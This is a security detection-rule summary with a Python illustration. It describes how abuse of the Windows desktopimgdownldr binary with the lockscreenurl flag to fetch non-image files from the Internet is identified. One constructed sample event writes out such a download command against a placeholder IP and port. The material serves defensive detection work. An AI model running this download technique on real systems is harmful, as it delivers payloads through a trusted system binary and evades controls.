
Summary
This detection rule identifies execution of the Microsoft Desktopimgdownldr process in a suspicious manner, specifically where it appears to be used to download files from the Internet. The rule keys on command-line arguments typically associated with unwanted or malicious downloads. It carries a high severity level because of the command-and-control (C&C) behaviour commonly observed in threats that abuse file-download mechanisms. To separate ordinary execution from suspicious use, the rule looks for the '-lockscreenurl' flag on the command line. It then filters out common image file extensions ('.jpg', '.jpeg' and '.png') to reduce false positives, so that detection focuses on potentially harmful operations, including those involving registry modifications. Because file downloads are routine, environmental context is essential when judging the legitimacy of an alert: ordinary administrative scripts can trigger it. This detection supports proactive measures against unauthorized file downloads and C&C activity.
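As an added example (not the rule's own definition or code), the following Python function applies the criteria described above to constructed Windows process-creation events. The field names Image and CommandLine, the binary name desktopimgdownldr.exe, the acceptance of '/' as well as '-' before lockscreenurl, and the sample URLs are assumptions made for this illustration.

```python
# Added example: evaluate process-creation events against the summary's logic.
# Field names (Image, CommandLine) and the sample events are constructed
# assumptions, not the rule's own format or data.
import re
from typing import Dict, List

# Benign lock-screen customisation points at an ordinary image file.
IMAGE_EXTENSIONS = (".jpg", ".jpeg", ".png")

def is_suspicious_desktopimgdownldr(event: Dict[str, str]) -> bool:
    """Return True when an event matches the rule's criteria.

    1. the process is desktopimgdownldr.exe (binary name assumed here)
    2. the command line carries the lockscreenurl flag; the page writes it as
       '-lockscreenurl', and '/' is also accepted as an assumption
    3. the target is not a common image file, which would be a false positive
    """
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "")
    if not image.endswith("\\desktopimgdownldr.exe"):
        return False
    if not re.search(r"[-/]lockscreenurl", cmd, re.IGNORECASE):
        return False
    if any(ext in cmd.lower() for ext in IMAGE_EXTENSIONS):
        return False
    return True

def find_matches(events: List[Dict[str, str]]) -> List[str]:
    """Return the command lines of all events that trigger the detection."""
    return [e["CommandLine"] for e in events if is_suspicious_desktopimgdownldr(e)]

# Constructed sample events; hosts and paths are placeholders.
SAMPLE_EVENTS = [
    # Ordinary wallpaper download: filtered out by the image-extension check.
    {"Image": r"C:\Windows\System32\desktopimgdownldr.exe",
     "CommandLine": r"desktopimgdownldr.exe /lockscreenurl:https://intranet.example/wallpaper.jpg"},
    # Non-image target fetched from the Internet: matches the rule.
    {"Image": r"C:\Windows\System32\desktopimgdownldr.exe",
     "CommandLine": r"desktopimgdownldr.exe /lockscreenurl:http://198.51.100.7:8080/update.ext"},
    # Unrelated process: never considered.
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\Public\notes.txt"},
]

if __name__ == "__main__":
    for cmd in find_matches(SAMPLE_EVENTS):
        print("ALERT:", cmd)
```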
Categories
- Endpoint
- Windows
Data Sources
- Process
Created: 2020-07-03